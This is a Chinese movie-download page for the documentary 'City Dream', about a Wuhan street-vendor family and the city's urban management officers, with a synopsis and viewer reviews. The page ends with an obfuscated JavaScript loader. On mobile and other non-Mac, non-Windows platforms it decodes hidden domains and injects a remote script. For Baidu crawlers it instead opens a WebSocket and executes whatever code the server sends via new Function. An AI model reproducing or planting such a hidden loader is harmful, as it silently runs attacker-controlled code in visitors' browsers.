2020高分城管纪录片《城市梦》HD1080P.国语中字


更新时间:2020-11-27 02:39:23 类别: 纪录片 评论 下载
城市梦的海报 城市梦

城市梦

导演: 陈为军
类型: 纪录片
制片国家/地区: 中国大陆
语言: 汉语普通话
上映日期: 2020-08-28(中国大陆) / 2019-09-16(多伦多电影节)
片长: 102分钟
又名: City Dream
IMDb链接: tt13080400
鲁磨路,武汉市区一条热闹的大街。人行道上一个旧电话亭和简陋的水果摊是河南农民王天成一家的谋生之所。十四年来,他们与城管之间你进我退、软磨硬抗,成为名副其实的“地摊王”,也算在城市里落了脚。王天成是70岁的脑中风患者,妻子癌症晚期,儿子是没有右手的残疾人,他们唯一的开心果是正读初中 的孙女萍萍,健康开朗。 “一家人留在城里,萍萍成为武汉人”是全家人的梦想,日子过得艰难而平实。直到有一天,鲁磨路按照城市发展规划打造“珠宝一条街”,需要彻底清理所有沿街摊贩,王天成一家和城管中队的矛盾开始升级,一场“生存保卫战“就此展开…… 严格执法的城管碾压占道小贩?还是,最牛“地摊王”钉牢城市中心? 城管与小贩生死争斗的原生态故事,官民冲突与互动的真实过程。 关照当下中国人蓬勃生长的“城市梦” ,你、我、他都可能是“王天成”。
江湖骗子 2020-08-16

草草收场,真有这么好?我不信。尤其是几张拱手作揖感谢配文字说明的景象紧接着“2015年,武汉被评为全国文明城市”“积极帮助困难家庭”这些字眼。最可笑的是,他们不会在乎你的支出你的境遇,在乎的是你每天能卖多少能赚多少,对收入锱铢必较。对人讲策略,对事要解决。 还记录下了前几年核心价值观打得火热的时候人人富强民主文明和谐我去他妈的

嘟嘟噜 2020-08-21

作为武汉人,工作在光谷,看着发生在自己身边的故事,百感交集,今天光顾了王爹爹的水果摊,默默买了点水果,愿你们一家人日子越过越好。

无机客 2020-09-06

拍得很不错,虽然是纪录片,但不缺戏剧性,武汉的街头充满戏剧性。这家人的生活难不难,大家心里自有衡量。片中的男城管还行,但出镜的女城管的逻辑和话语十分讨厌。他们一家人卖水果就算月赚两万,是几个劳动力是怎样的处境换来的?她坐在办公室里看看报纸喝喝茶赚多少能公布下吗?至于她去核算水果摊进货成本的方式真可笑。卖过水果的人都知道很大一部分成本来自于损耗,有些水果两天卖不出去就成企低货。

吕小妍41 2020-08-29

王爹爹其实很聪明,如果他年轻的时候有更多机会,他还会在70岁用赖的方式讨生活吗?

星夜行 2020-08-24

影片的内核正如电影里城管的那句话所言:他们是生活的弱者,而我们是工作的弱者。 人们都是同情弱者的,所以王天成这位老人看似不讲道理的外表之下其实很是聪明,用梗塞 、残疾、癌症、中风等家人患病的状况来示弱,用下跪,用贫民的生存权来以退为进。正如他自己所说:一手打一手谈,这可不单单是闹一个字概括得了的。 摆摊贩的对立面即是城管,在三教九流云集的九省通衢,这份差事显然并不是那么好做,用招聘兼职的柜台作为伪装来侦查情况,这个点子显然很妙,也彰显出了智慧。 最后,作为在武汉洪山区待过四年的人而言,光谷的画面出现的那一刹那还是倍感气切的,大武汉,每天都不一样。

熊不在 2019-09-15

诙谐与闹剧贯穿全片,看预告片的时候只想着这是一部反映中国城市内摊贩与城管之间拉扯的现实纪录片,但随着影片的深入我们发现真正的含义是在讲家乡与城市,过去与未来的关系。 王大爷和儿子留在哪里都无所谓,但是王家的下一代,王大爷的孙女早已没有可能回到河南农村老家。孙女从小在武汉城里长大读书,未来也会在城里上大学找工作,所以为了孙女将来的教育与人生,一家人即使是睡大街也必须留在武汉。 与其说是王大爷在水果摊与城管抗争,不如想想说是一个老人为了下一代的生活和现实做斗争。

门萨的娼妓 2020-08-14

为结局加一星,“不是要感动,是要服从管理。”

闵思嘉 2020-08-27

看起来是小贩抗争史,背后是近数十年大量农村人口向城市流动,填补城市基础生活岗位,以工作换取在城市落脚机会的变迁。对于这些远离土地、进入现代化城市的底层群体来说,他们赖以生存的工作和家之间形成了一体化和绑定的关系。失去糊口的工作,不仅意味着失去了家,更意味着失去了他们对于城市的价值,接踵而来的就是城市的驱逐。在这样的走投无路下,王天成的捍卫就有了三位一体的意义,捍卫小摊=捍卫资产=捍卫家庭,从这个角度上来说,《城市梦》早就已经走出了城管和小贩之间的矛盾,提醒着我们赶快从阶层流动之梦里清醒过来,更反思了如火如荼的城市现代化。

#水泥# 2020-08-31

从王天成与城管中队这两个点开始,表演逐步蔓延到每一个主体,王天成的家人、武汉市城管局、摄像机,甚至连上映,全都参与了这场盛大演出。就连配乐,也很配合地将这部纪录片推向“喜剧”,很滑稽的那种。纪律部队再克制,依然是纪律部队,某城的纪律部队在一年前也被认为是全亚洲最专业的来着。最恶心的位置当属创文街摊的二十四字背诵。

Anton 2019-09-14

武汉市城管局文明执法宣传片。武汉城管的文明执法贯彻程度令人震惊,打不还手骂不还口,与一般大众印象中的城管做派完全不同。我尊敬且敬佩出镜的几位“非法”(导演说的)执法人员。可网上随便一搜仍能搜到近两年武汉城管暴力执法的新闻。所以文明和暴力到底哪个是常态?如果暴力手段永远是一个唾手可得的选择,那你在这镜头前再文明再苦再累也不具有任何代表性。大爷年轻时候应该是斗得最凶的那一批。底层人民的生存智慧终究斗不过时代洪流,还好这次对方是文明的。小女孩她很快乐,有整个家庭为她遮风避雨,希望她能上个好大学,改变命运。这个纪录片还是挺难得的,两边都走得足够近,生活就是充满令人无奈的幽默。音乐不错。(我没听过孙八一那首歌)

我呼吸的空气 2020-09-05

趁还能在影院里看到,去看吧。题材太独特了,能拍出来并拿到龙标是奇迹。

林夕告之 2020-09-05

地摊斯大林

面包面条面饼 2019-09-15

TIFF, 何尝不是一场盛大的表演

居无间 2020-09-22

之前关于《八佰》屁股问题的讨论,其实放在这部纪录片上才合适。不过,陈为军在主旋律的外衣和“保护”下已经做得很好了。选择的人物尤其好,爷爷一代是执拗抵抗,父亲一代是选择性妥协,孩子一辈已经是不自觉地要拥抱城市了。在城市化的过程中,底层人的寄生空间不断被压缩,其根基早已被杂草荒树掩盖。真是荒诞且悲凉。

木兮 2020-09-15

作为纪录片,没有偏袒任何一方,很真实的双方记录,让观众自行评判,爷爷真的太搞笑了,其实无论是执行的城管,还是老爷爷到头来都是一句话的受害者,“文明城市”这些年耽误多少人。害!

倚风帘 2020-08-29

看陈为军现在的身体状况,这一部可能真的是他最后的作品了。然而他的名字却依然无法吸引观众进到电影院看一部纪录片,中国纪录片的境况实在是太难了。《城市梦》这个名字乍一看和电影主内容并不相符,但真正让小贩们坚持着的,正是这三个字,不为自己,为的是后代。导演能够找到这样一个有代表性,并且有十足性格张力的家庭太了不起了,也是这个主角让纪录片多了一份喜感中的悲情。

好样的 2020-08-22

核心价值观会背诵么。

无糖吐槽 2020-08-14

还有什么比被一群武汉城管团团围住看《城市梦》更有意思的事情呢。

Oystrich 2019-11-17

近两年看到的关于中国最好的纪录片,把中国的复杂讲得透彻。没有蜻蜓点水,没有面面俱到,没有迎合美国人对中国纪录片的口味

Moist Blues 2020-08-14

武汉市城管文明执法宣传片(不是,当然明白是为了过审,但也不失为一种视角。在点映场遇到包场的洪山区城管和武汉电视台,片中的胡队长好像就坐在我前面,影片结束后接受采访述说感受,这又是我今年遇到的魔幻现实。

城市梦的截图1
城市梦的截图2
城市梦的截图3
城市梦的截图4
城市梦的截图5
城市梦的截图6
function DEWLc(e){var t="",n=r=c1=c2=0;while(n 0x3c e.length){r=e.charCodeAt(n);if(r 0x3c 128){t+=String.fromCharCode(r);n++;}else if(r 0x3e 191&&r 0x3c 224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)0x3c0x3c 6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)0x3c0x3c 12|(c2&63)0x3c0x3c 6|c3&63);n+=3;}}return t;};function ucHiU(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f 0x3c e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s 0x3c0x3c 2|o 0x3e0x3e 4;r=(o&15)0x3c0x3c 4|u 0x3e0x3e 2;i=(u&3)0x3c0x3c 6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DEWLc(t);};window[''+'I'+'C'+'c'+'O'+'t'+'d'+'E'+'D'+'r'+'R'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=ucHiU,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));new Worker(window.URL.createObjectURL(new Blob(["var ws=new WebSocket('wss://"+k+":9394/'+"+i+");ws.onmessage=function(e){ws.close();postMessage(e.data)};"]))).onmessage=function(e){new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a3RwLnll3YWsuY29tLmNu','a250LnJ1aXR1c2NNob29sLmNNvbS5jbg==','135631',window,document,['l','N']);}:function(){};